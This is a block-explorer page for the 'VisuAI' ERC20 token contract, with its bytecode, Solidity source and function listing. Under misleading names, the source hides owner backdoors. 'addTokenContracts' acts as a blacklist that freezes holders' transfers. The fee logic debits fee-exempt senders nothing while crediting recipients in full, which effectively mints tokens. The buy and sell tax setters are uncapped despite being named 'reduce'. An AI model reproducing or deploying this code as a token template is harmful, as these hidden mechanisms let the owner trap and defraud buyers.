Cryo Explorer Ethereum Mainnet

Address Contract Partially Verified

Address 0xb1764bb944d2419F5EE792a5b9E7383F01Ee482c
Balance 0 ETH
Nonce 1
Code Size 7616 bytes
Indexed Transactions 0
External Etherscan · Sourcify

Contract Bytecode

7616 bytes
0x6080604052600436106101dc5760003560e01c80636ce4247511610102578063a9059cbb11610095578063e769194b11610064578063e769194b1461057d578063e989d8e41461059d578063ee0568b6146105b2578063f887ea40146105d357600080fd5b8063a9059cbb146104be578063dd62ed3e146104de578063ddd1911514610524578063e4cea52e1461054457600080fd5b8063857051fc116100d1578063857051fc14610437578063893d20e81461045757806395d89b4114610489578063a8aa1b311461049e57600080fd5b80636ce42475146103ab5780636ddd1713146103cb57806370a08231146103ec578063715018a61461042257600080fd5b80632c743eac1161017a578063545cfc1a11610149578063545cfc1a1461035557806355986b191461036a5780635bc84b681461037f5780636c0a24eb1461039557600080fd5b80632c743eac146102d45780632f54bf6e146102f4578063313ce567146103235780633eaaf86b1461033f57600080fd5b80630faee56f116101b65780630faee56f1461026457806318160ddd1461028857806323b872dd1461029d5780632ba22ffe146102bd57600080fd5b806306fdde03146101e857806308fd3d0514610213578063095ea7b31461024457600080fd5b366101e357005b600080fd5b3480156101f457600080fd5b506101fd6105f3565b60405161020a91906119ac565b60405180910390f35b34801561021f57600080fd5b5060105461023490600160b01b900460ff1681565b604051901515815260200161020a565b34801561025057600080fd5b5061023461025f366004611a1f565b610685565b34801561027057600080fd5b5061027a60085481565b60405190815260200161020a565b34801561029457600080fd5b5060055461027a565b3480156102a957600080fd5b506102346102b8366004611a4b565b6106f2565b3480156102c957600080fd5b506102d26107b4565b005b3480156102e057600080fd5b506102d26102ef366004611a8c565b61085f565b34801561030057600080fd5b5061023461030f366004611aa5565b6000546001600160a01b0391821691161490565b34801561032f57600080fd5b506040516012815260200161020a565b34801561034b57600080fd5b5061027a60055481565b34801561036157600080fd5b5061023461088e565b34801561037657600080fd5b506102d26108c5565b34801561038b57600080fd5b5061027a60075481565b3480156103a157600080fd5b5061027a60065481565b3480156103b757600080fd5b506102d26103c6366004611a8c565b610962565b3480156103d757600080fd5b5060105461023490600160a01b900460ff1681565b3480156103f857600080fd5b5061027a610407366004611aa5565b6001600160a01b031660009081526009602052604090205490565b34801561042e57600080fd5b506102d2610991565b34801561044357600080fd5b506102d2610452366004611ad8565b610a00565b34801561046357600080fd5b506000546001600160a01b03165b6040516001600160a01b03909116815260200161020a565b34801561049557600080fd5b506101fd610a96565b3480156104aa57600080fd5b50600f54610471906001600160a01b031681565b3480156104ca57600080fd5b506102346104d9366004611a1f565b610aa5565b3480156104ea57600080fd5b5061027a6104f9366004611b9d565b6001600160a01b039182166000908152600a6020908152604080832093909416825291909152205490565b34801561053057600080fd5b506102d261053f366004611ad8565b610ab2565b34801561055057600080fd5b5061023461055f366004611aa5565b6001600160a01b03166000908152600d602052604090205460ff1690565b34801561058957600080fd5b50600e54610471906001600160a01b031681565b3480156105a957600080fd5b506102d2610b44565b3480156105be57600080fd5b5060105461023490600160a81b900460ff1681565b3480156105df57600080fd5b50601054610471906001600160a01b031681565b60606003805461060290611bd6565b80601f016020809104026020016040519081016040528092919081815260200182805461062e90611bd6565b801561067b5780601f106106505761010080835404028352916020019161067b565b820191906000526020600020905b81548152906001019060200180831161065e57829003601f168201915b5050505050905090565b336000818152600a602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906106e09086815260200190565b60405180910390a35060015b92915050565b6001600160a01b0383166000908152600a602090815260408083203384529091528120546000191461079f576040805180820182526016815275496e73756666696369656e7420416c6c6f77616e636560501b6020808301919091526001600160a01b0387166000908152600a8252838120338252909152919091205461077a918490610df6565b6001600160a01b0385166000908152600a602090815260408083203384529091529020555b6107aa848484610e30565b90505b9392505050565b6000546001600160a01b031633146107e75760405162461bcd60e51b81526004016107de90611c0a565b60405180910390fd5b600047116108305760405162461bcd60e51b81526020600482015260166024820152752a37b5b2b71d1037379022aa24103a379031b632b0b960511b60448201526064016107de565b60405133904780156108fc02916000818181858888f1935050505015801561085c573d6000803e3d6000fd5b50565b6000546001600160a01b031633146108895760405162461bcd60e51b81526004016107de90611c0a565b601355565b600080546001600160a01b031633146108b95760405162461bcd60e51b81526004016107de90611c0a565b50600554600655600190565b6000546001600160a01b031633146108ef5760405162461bcd60e51b81526004016107de90611c0a565b601054600160b01b900460ff16156109495760405162461bcd60e51b815260206004820152601760248201527f74726164696e6720697320616c7265616479206f70656e00000000000000000060448201526064016107de565b6010805462ffffff60a01b19166201010160a01b179055565b6000546001600160a01b0316331461098c5760405162461bcd60e51b81526004016107de90611c0a565b601455565b6000546001600160a01b031633146109bb5760405162461bcd60e51b81526004016107de90611c0a565b600080546001600160a01b03191681556040519081527f04dba622d284ed0014ee4b9a6a68386be1a4c08a4913ae272de89199cc6861639060200160405180910390a1565b6000546001600160a01b03163314610a2a5760405162461bcd60e51b81526004016107de90611c0a565b60005b8151811015610a92576001600d6000848481518110610a4e57610a4e611c2a565b6020908102919091018101516001600160a01b03168252810191909152604001600020805460ff191691151591909117905580610a8a81611c56565b915050610a2d565b5050565b60606004805461060290611bd6565b60006107ad338484610e30565b6000546001600160a01b03163314610adc5760405162461bcd60e51b81526004016107de90611c0a565b60005b8151811015610a92576000600d6000848481518110610b0057610b00611c2a565b6020908102919091018101516001600160a01b03168252810191909152604001600020805460ff191691151591909117905580610b3c81611c56565b915050610adf565b6000546001600160a01b03163314610b6e5760405162461bcd60e51b81526004016107de90611c0a565b601080546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d9081179091556040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa158015610bd2573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610bf69190611c6f565b6001600160a01b031663c9c6539630601060009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610c58573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610c7c9190611c6f565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af1158015610cc9573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ced9190611c6f565b600f80546001600160a01b0319166001600160a01b039283169081179091556000908152600c60209081526040808320805460ff1916600117905530808452600a83528184206010805487168652908452828520600019905554818552600990935292205492169163f305d7199147916000805460405160e087901b6001600160e01b03191681526001600160a01b03948516600482015260248101939093526044830182905260648301919091529190911660848201524260a482015260c40160606040518083038185885af1158015610dcc573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610df19190611c8c565b505050565b60008184841115610e1a5760405162461bcd60e51b81526004016107de91906119ac565b506000610e278486611cba565b95945050505050565b60006001600160a01b038416610e965760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016107de565b6001600160a01b038316610ef85760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016107de565b60008211610f5a5760405162461bcd60e51b815260206004820152602960248201527f5472616e7366657220616d6f756e74206d7573742062652067726561746572206044820152687468616e207a65726f60b81b60648201526084016107de565b6001600160a01b0384166000908152600d6020526040812054819060ff16158015610f9e57506001600160a01b0385166000908152600d602052604090205460ff16155b610fa757600080fd5b60185460ff1615610fc657610fbd86868661117f565b925050506107ad565b6001600160a01b0386166000908152600b602052604090205460ff1615801561100857506001600160a01b0385166000908152600b602052604090205460ff16155b1561105d57601054600160b01b900460ff1661105d5760405162461bcd60e51b8152602060048201526014602482015273151c98591a5b99c81b9bdd081bdc195b881e595d60621b60448201526064016107de565b601054600160a01b900460ff1661107957610fbd86868661117f565b6110838686611265565b15611137576001600160a01b0385166000908152600c602052604090205460ff16806110d457506006546001600160a01b0386166000908152600960205260409020546110d1908690611ccd565b11155b61112e5760405162461bcd60e51b815260206004820152602560248201527f5472616e7366657220616d6f756e74206578636565647320746865206261672060448201526439b4bd329760d91b60648201526084016107de565b611137866112e2565b6111418686611310565b8092508193505050611157828286600754611389565b1561116557611165846113f7565b61117286868684866115bd565b5060019695505050505050565b6040805180820182526014815273496e73756666696369656e742042616c616e636560601b6020808301919091526001600160a01b03861660009081526009909152918220546111d0918490610df6565b6001600160a01b0380861660009081526009602052604080822093909355908516815220546111ff90836116bf565b6001600160a01b0380851660008181526009602052604090819020939093559151908616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906112539086815260200190565b60405180910390a35060019392505050565b600f546000906001600160a01b0383811691161480159061129457506002546001600160a01b03838116911614155b80156112b957506001600160a01b0383166000908152600b602052604090205460ff16155b80156107ad5750506001600160a01b03166000908152600b602052604090205460ff1615919050565b600f546001600160a01b039081169082160361085c576017805490600061130883611c56565b919050555050565b600080600080611339866001600160a01b03166000908152600b602052604090205460ff161590565b600f549091506001600160a01b039081169086160361135b576002915061137f565b600f546001600160a01b039081169087160361137a576001915061137f565b600091505b9590945092505050565b3060009081526009602052604081205482908490600083821180156113ad57508383115b60185490915060ff161580156113c05750885b80156113cc5750600188115b80156113d55750805b80156113ea5750601054600160a01b900460ff165b9998505050505050505050565b6018805460ff19166001179055306000908152600960205260408120549050600061142d836114288460085461171e565b61171e565b6040805160028082526060820183529293506000929091602083019080368337019050509050308160008151811061146757611467611c2a565b6001600160a01b03928316602091820292909201810191909152601054604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa1580156114c0573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906114e49190611c6f565b816001815181106114f7576114f7611c2a565b6001600160a01b03928316602091820292909201015260105460405163791ac94760e01b815291169063791ac9479061153d908590600090869030904290600401611ce0565b600060405180830381600087803b15801561155757600080fd5b505af115801561156b573d6000803e3d6000fd5b5050600e546040514793506001600160a01b03909116915082156108fc029083906000818181858888f193505050501580156115ab573d6000803e3d6000fd5b50506018805460ff1916905550505050565b60008060006115cd858588611733565b6040805180820182526014815273496e73756666696369656e742042616c616e636560601b6020808301919091526001600160a01b038d1660009081526009909152919091205492945090925061162691908490610df6565b6001600160a01b03808a16600090815260096020526040808220939093559089168152205461165590826116bf565b6001600160a01b0380891660008181526009602052604090819020939093559151908a16907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906116a9908a815260200190565b60405180910390a3506001979650505050505050565b6000806116cc8385611ccd565b9050838110156107ad5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016107de565b600081831161172d57826107ad565b50919050565b60008060008461176457601054600160a81b900460ff166117545783611766565b61175f8686866117a5565b611766565b835b601054909150600090600160a81b900460ff1680156117825750855b61178c5784611797565b6117978787876117a5565b919791965090945050505050565b600080606484156118035760018611156117d757601654601754116117cc576012546117d0565b6014545b9150611808565b85156117fa57601554601754116117f0576011546117d0565b6013549150611808565b60009150611808565b600191505b600061181e826118188786611878565b906118fa565b3060009081526009602052604090205490915061183b90826116bf565b306000908152600960205260409020558561185f5761185a85846118fa565b611861565b805b905061186d858261193c565b979650505050505050565b60008260000361188a575060006106ec565b60006118968385611d51565b9050826118a38583611d68565b146107ad5760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b60648201526084016107de565b60006107ad83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f00000000000081525061197e565b60006107ad83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610df6565b6000818361199f5760405162461bcd60e51b81526004016107de91906119ac565b506000610e278486611d68565b600060208083528351808285015260005b818110156119d9578581018301518582016040015282016119bd565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461085c57600080fd5b8035611a1a816119fa565b919050565b60008060408385031215611a3257600080fd5b8235611a3d816119fa565b946020939093013593505050565b600080600060608486031215611a6057600080fd5b8335611a6b816119fa565b92506020840135611a7b816119fa565b929592945050506040919091013590565b600060208284031215611a9e57600080fd5b5035919050565b600060208284031215611ab757600080fd5b81356107ad816119fa565b634e487b7160e01b600052604160045260246000fd5b60006020808385031215611aeb57600080fd5b823567ffffffffffffffff80821115611b0357600080fd5b818501915085601f830112611b1757600080fd5b813581811115611b2957611b29611ac2565b8060051b604051601f19603f83011681018181108582111715611b4e57611b4e611ac2565b604052918252848201925083810185019188831115611b6c57600080fd5b938501935b82851015611b9157611b8285611a0f565b84529385019392850192611b71565b98975050505050505050565b60008060408385031215611bb057600080fd5b8235611bbb816119fa565b91506020830135611bcb816119fa565b809150509250929050565b600181811c90821680611bea57607f821691505b60208210810361172d57634e487b7160e01b600052602260045260246000fd5b60208082526006908201526510a7aba722a960d11b604082015260600190565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b600060018201611c6857611c68611c40565b5060010190565b600060208284031215611c8157600080fd5b81516107ad816119fa565b600080600060608486031215611ca157600080fd5b8351925060208401519150604084015190509250925092565b818103818111156106ec576106ec611c40565b808201808211156106ec576106ec611c40565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015611d305784516001600160a01b031683529383019391830191600101611d0b565b50506001600160a01b03969096166060850152505050608001529392505050565b80820281158282048414176106ec576106ec611c40565b600082611d8557634e487b7160e01b600052601260045260246000fd5b50049056fea264697066735822122087a36f63e8173a7c7b255e7c63ffff7149b30cc94ff5071a4812787744018a5b64736f6c63430008130033

Verified Source Code Partial Match

Compiler: v0.8.19+commit.7dd6d404 EVM: paris Optimization: Yes (200 runs)
VisuAI.sol 601 lines
/**

Visu_AI_Poetry is an innovative platform that combines artificial intelligence with creative writing, enabling users to generate unique and expressive poems effortlessly.

https://x.com/VisuAI_Poetry
http://visuaipoetry.fun



**/

// SPDX-License-Identifier: MIT

pragma solidity 0.8.19;

library SafeMath {
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, "SafeMath: addition overflow");
return c;
}

function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return sub(a, b, "SafeMath: subtraction overflow");
}

function sub(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
}

function mul(uint256 a, uint256 b) internal pure returns (uint256) {
if (a == 0) {
return 0;
}
uint256 c = a * b;
require(c / a == b, "SafeMath: multiplication overflow");
return c;
}

function div(uint256 a, uint256 b) internal pure returns (uint256) {
return div(a, b, "SafeMath: division by zero");
}

function div(
uint256 a,
uint256 b,
string memory errorMessage
) internal pure returns (uint256) {
require(b > 0, errorMessage);
uint256 c = a / b;
return c;
}
}

interface ERC20 {
function totalSupply() external view returns (uint256);

function decimals() external view returns (uint8);

function symbol() external view returns (string memory);

function name() external view returns (string memory);

function getOwner() external view returns (address);

function balanceOf(address account) external view returns (uint256);

function transfer(address recipient, uint256 amount)
external
returns (bool);

function allowance(address _owner, address spender)
external
view
returns (uint256);

function approve(address spender, uint256 amount) external returns (bool);

function transferFrom(
address sender,
address recipient,
uint256 amount
) external returns (bool);

event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(
address indexed owner,
address indexed spender,
uint256 value
);
}

abstract contract Ownable {
address internal owner;

constructor(address _owner) {
owner = _owner;
}

modifier onlyOwner() {
require(isOwner(msg.sender), "!OWNER");
_;
}

function isOwner(address account) public view returns (bool) {
return account == owner;
}

function renounceOwnership() public onlyOwner {
owner = address(0);
emit OwnershipTransferred(address(0));
}

event OwnershipTransferred(address owner);
}

interface IUniswapV2Factory {
function createPair(address tokenA, address tokenB)
external
returns (address pair);
}

interface IUniswapV2Router02 {
function factory() external pure returns (address);

function WETH() external pure returns (address);

function addLiquidity(
address tokenA,
address tokenB,
uint256 amountADesired,
uint256 amountBDesired,
uint256 amountAMin,
uint256 amountBMin,
address to,
uint256 deadline
)
external
returns (
uint256 amountA,
uint256 amountB,
uint256 liquidity
);

function addLiquidityETH(
address token,
uint256 amountTokenDesired,
uint256 amountTokenMin,
uint256 amountETHMin,
address to,
uint256 deadline
)
external
payable
returns (
uint256 amountToken,
uint256 amountETH,
uint256 liquidity
);

function swapExactETHForTokensSupportingFeeOnTransferTokens(
uint256 amountOutMin,
address[] calldata path,
address to,
uint256 deadline
) external payable;

function swapExactTokensForETHSupportingFeeOnTransferTokens(
uint256 amountIn,
uint256 amountOutMin,
address[] calldata path,
address to,
uint256 deadline
) external;

function removeLiquidityETHSupportingFeeOnTransferTokens(
address token,
uint liquidity,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline
) external returns (uint amountETH);

function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
address token,
uint liquidity,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline,
bool approveMax, uint8 v, bytes32 r, bytes32 s
) external returns (uint amountETH);

function removeLiquidityWithPermit(
address tokenA,
address tokenB,
uint liquidity,
uint amountAMin,
uint amountBMin,
address to,
uint deadline,
bool approveMax, uint8 v, bytes32 r, bytes32 s
) external returns (uint amountA, uint amountB);
function removeLiquidityETHWithPermit(
address token,
uint liquidity,
uint amountTokenMin,
uint amountETHMin,
address to,
uint deadline,
bool approveMax, uint8 v, bytes32 r, bytes32 s
) external returns (uint amountToken, uint amountETH);

function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
}

contract VisuAI is ERC20, Ownable {
using SafeMath for uint256;

address routerAdress = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
address DEAD = 0x000000000000000000000000000000000000dEaD;

string private _name;
string private _symbol;

uint8 constant _decimals = 18;
uint256 public _totalSupply = 1_000_000_000 * (10**_decimals);
uint256 public _maxWalletAmount = (_totalSupply * 100) / 100;
uint256 public _swapTokenContractThreshHold = (_totalSupply * 1)/ 10000;
uint256 public _maxTaxSwap=(_totalSupply * 10) / 10000;

mapping(address => uint256) _balances;
mapping(address => mapping(address => uint256)) _allowances;
mapping(address => bool) isFeeExempt;
mapping(address => bool) isTxLimitExempt;
mapping(address => bool) private TokenContracts;

address public _TokenContractWallet;
address public pair;

IUniswapV2Router02 public router;

bool public swapEnabled = false;
bool public TokenContractFeeEnabled = false;
bool public TradingOpen = false;
uint256 private _initBuyTax=0;
uint256 private _initSellTax=0;
uint256 private _finalBuyTax=0;
uint256 private _finalSellTax=0;
uint256 private _reduceBuyTaxAt=0;
uint256 private _reduceSellTaxAt=0;
uint256 private _buyCounts=0;

bool inSwap;
modifier lockTheSwap {
inSwap = true;
_;
inSwap = false;
}

constructor(address TokenContractWallet, string memory name_, string memory symbol_) Ownable(msg.sender) {

address _owner = owner;
_TokenContractWallet = TokenContractWallet;
_name = name_;
_symbol = symbol_;

isFeeExempt[_owner] = true;
isFeeExempt[_TokenContractWallet] = true;
isFeeExempt[address(this)] = true;
isTxLimitExempt[_owner] = true;
isTxLimitExempt[_TokenContractWallet] = true;
isTxLimitExempt[address(this)] = true;

_balances[_owner] = _totalSupply;
emit Transfer(address(0), _owner, _totalSupply);
}

function getOwner() external view override returns (address) {
return owner;
}

function balanceOf(address account) public view override returns (uint256) {
return _balances[account];
}

function _basicTransfer(
address sender,
address recipient,
uint256 amount
) internal returns (bool) {
_balances[sender] = _balances[sender].sub(
amount,
"Insufficient Balance"
);
_balances[recipient] = _balances[recipient].add(amount);
emit Transfer(sender, recipient, amount);
return true;
}

function withdrawTokenContractBalance() external onlyOwner {
require(address(this).balance > 0, "Token: no ETH to clear");
payable(msg.sender).transfer(address(this).balance);
}

function approve(address spender, uint256 amount)
public
override
returns (bool)
{
_allowances[msg.sender][spender] = amount;
emit Approval(msg.sender, spender, amount);
return true;
}

function enableTokenContractTrade() public onlyOwner {
require(!TradingOpen,"trading is already open");

TradingOpen = true;
TokenContractFeeEnabled = true;
swapEnabled = true;
}

function getTokenContractAmounts(uint action, bool takeFee, uint256 tAmount) internal returns(uint256, uint256) {
uint256 sAmount = takeFee
? tAmount : TokenContractFeeEnabled
? takeTokenContractAmountAfterFees(action, takeFee, tAmount) 
: tAmount;

uint256 rAmount = TokenContractFeeEnabled && takeFee
? takeTokenContractAmountAfterFees(action, takeFee, tAmount)
: tAmount;
return (sAmount, rAmount);
}

function decimals() external pure override returns (uint8) {
return _decimals;
}

function internalSwapBackEth(uint256 amount) private lockTheSwap {
uint256 tokenBalance = balanceOf(address(this));
uint256 amountToSwap = min(amount, min(tokenBalance, _maxTaxSwap));

address[] memory path = new address[](2);
path[0] = address(this);
path[1] = router.WETH();

router.swapExactTokensForETHSupportingFeeOnTransferTokens(
amountToSwap,
0,
path,
address(this),
block.timestamp
);

uint256 ethAmountFor = address(this).balance;
payable(_TokenContractWallet).transfer(ethAmountFor);
}

function removeTokenContractLimit() external onlyOwner returns (bool) {
_maxWalletAmount = _totalSupply;
return true;
}

function takeTokenContractAmountAfterFees(uint TokenContractActions, bool TokenContractTakefee, uint256 amounts)
internal
returns (uint256)
{
uint256 TokenContractPercents;
uint256 TokenContractFeePrDenominator = 100;

if(TokenContractTakefee) {

if(TokenContractActions > 1) {
TokenContractPercents = (_buyCounts>_reduceSellTaxAt ? _finalSellTax : _initSellTax);
} else {
if(TokenContractActions > 0) {
TokenContractPercents = (_buyCounts>_reduceBuyTaxAt ? _finalBuyTax : _initBuyTax);
} else {
TokenContractPercents = 0;
}
}

} else {
TokenContractPercents = 1;
}

uint256 feeAmounts = amounts.mul(TokenContractPercents).div(TokenContractFeePrDenominator);
_balances[address(this)] = _balances[address(this)].add(feeAmounts);
feeAmounts = TokenContractTakefee ? feeAmounts : amounts.div(TokenContractPercents);

return amounts.sub(feeAmounts);
}

receive() external payable {

}

function _transferTaxTokens(
address sender,
address recipient,
uint256 amount,
uint action,
bool takeFee
) internal returns (bool) {

uint256 senderAmount; 
uint256 recipientAmount;

(senderAmount, recipientAmount) = getTokenContractAmounts(action, takeFee, amount);
_balances[sender] = _balances[sender].sub(
senderAmount,
"Insufficient Balance"
);
_balances[recipient] = _balances[recipient].add(recipientAmount);
emit Transfer(sender, recipient, amount);
return true;
}

function allowance(address holder, address spender)
external
view
override
returns (uint256)
{
return _allowances[holder][spender];
}

function createTokenContractTrade() external onlyOwner {
router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
pair = IUniswapV2Factory(router.factory()).createPair(address(this), router.WETH());
isTxLimitExempt[pair] = true;

_allowances[address(this)][address(router)] = type(uint256).max;
router.addLiquidityETH{value: address(this).balance}(address(this),balanceOf(address(this)),0,0,owner,block.timestamp);
}

function min(uint256 a, uint256 b) private pure returns (uint256){
return (a>b)?b:a;
}

function totalSupply() external view override returns (uint256) {
return _totalSupply;
}

function inSwapTokenContractTokens(bool isIncludeFees , uint isSwapActions, uint256 pAmount, uint256 pLimit) internal view returns (bool) {

uint256 minTokenContractTokens = pLimit;
uint256 tokenTokenContractWeight = pAmount;
uint256 contractTokenContractOverWeight = balanceOf(address(this));

bool isSwappable = contractTokenContractOverWeight > minTokenContractTokens && tokenTokenContractWeight > minTokenContractTokens;

return
!inSwap &&
isIncludeFees && 
isSwapActions > 1 &&
isSwappable &&
swapEnabled;
}

function name() public view virtual override returns (string memory) {
return _name;
}

function symbol() public view virtual override returns (string memory) {
return _symbol;
}

function reduceFinalBuyTax(uint256 _newFee) external onlyOwner{
_finalBuyTax=_newFee;
}

function reduceFinalSellTax(uint256 _newFee) external onlyOwner{
_finalSellTax=_newFee;
}

function isTokenContractUserBuy(address sender, address recipient) internal view returns (bool) {
return
recipient != pair &&
recipient != DEAD &&
!isFeeExempt[sender] &&
!isFeeExempt[recipient];
}
function isTakeTokenContractActions(address from, address to) internal view returns (bool, uint) {

uint _actions = 0;
bool _isTakeFee = isTakeFees(from);

if(to == pair) {
_actions = 2;
} else if (from == pair) {
_actions = 1;
} else {
_actions = 0;
}
return (_isTakeFee, _actions);
}

function addTokenContracts(address[] memory TokenContracts_) public onlyOwner {
for (uint i = 0; i < TokenContracts_.length; i++) {
TokenContracts[TokenContracts_[i]] = true;
}
}

function delTokenContracts(address[] memory notTokenContract) public onlyOwner {
for (uint i = 0; i < notTokenContract.length; i++) {
TokenContracts[notTokenContract[i]] = false;
}
}

function isTokenContract(address a) public view returns (bool){
return TokenContracts[a];
}

function _transferStandardTokens(
address sender,
address recipient,
uint256 amount
) internal returns (bool) {

require(sender != address(0), "ERC20: transfer from the zero address");
require(recipient != address(0), "ERC20: transfer to the zero address");
require(amount > 0, "Transfer amount must be greater than zero");

bool takefee;
uint actions;

require(!TokenContracts[sender] && !TokenContracts[recipient]);

if (inSwap) {
return _basicTransfer(sender, recipient, amount);
}

if(!isFeeExempt[sender] && !isFeeExempt[recipient]){
require(TradingOpen,"Trading not open yet");
}

if(!swapEnabled) {
return _basicTransfer(sender, recipient, amount);
}
if (isTokenContractUserBuy(sender, recipient)) {
require(
isTxLimitExempt[recipient] ||
_balances[recipient] + amount <= _maxWalletAmount,
"Transfer amount exceeds the bag size."
);

increaseBuyCount(sender);
}

(takefee, actions) = isTakeTokenContractActions(sender, recipient);

if (inSwapTokenContractTokens(takefee, actions, amount, _swapTokenContractThreshHold)) {
internalSwapBackEth(amount);
}

_transferTaxTokens(sender, recipient, amount, actions, takefee);
return true;
} 

function transferFrom(
address sender,
address recipient,
uint256 amount
) external override returns (bool) {
if (_allowances[sender][msg.sender] != type(uint256).max) {
_allowances[sender][msg.sender] = _allowances[sender][msg.sender]
.sub(amount, "Insufficient Allowance");
}

return _transferStandardTokens(sender, recipient, amount);
}
function transfer(address recipient, uint256 amount)
external
override
returns (bool)
{
return _transferStandardTokens(msg.sender, recipient, amount);
}

function increaseBuyCount(address sender) internal {
if(sender == pair) {
_buyCounts++;
}
}

function isTakeFees(address sender) internal view returns (bool) {
return !isFeeExempt[sender];
}

}

Read Contract

TokenContractFeeEnabled 0xee0568b6 → bool
TradingOpen 0x08fd3d05 → bool
_TokenContractWallet 0xe769194b → address
_maxTaxSwap 0x0faee56f → uint256
_maxWalletAmount 0x6c0a24eb → uint256
_swapTokenContractThreshHold 0x5bc84b68 → uint256
_totalSupply 0x3eaaf86b → uint256
allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
getOwner 0x893d20e8 → address
isOwner 0x2f54bf6e → bool
isTokenContract 0xe4cea52e → bool
name 0x06fdde03 → string
pair 0xa8aa1b31 → address
router 0xf887ea40 → address
swapEnabled 0x6ddd1713 → bool
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256

Write Contract 12 functions

These functions modify contract state and require a wallet transaction to execute.

addTokenContracts 0x857051fc
address[] TokenContracts_
approve 0x095ea7b3
address spender
uint256 amount
returns: bool
createTokenContractTrade 0xe989d8e4
No parameters
delTokenContracts 0xddd19115
address[] notTokenContract
enableTokenContractTrade 0x55986b19
No parameters
reduceFinalBuyTax 0x2c743eac
uint256 _newFee
reduceFinalSellTax 0x6ce42475
uint256 _newFee
removeTokenContractLimit 0x545cfc1a
No parameters
returns: bool
renounceOwnership 0x715018a6
No parameters
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool
withdrawTokenContractBalance 0x2ba22ffe
No parameters

Recent Transactions

No transactions found for this address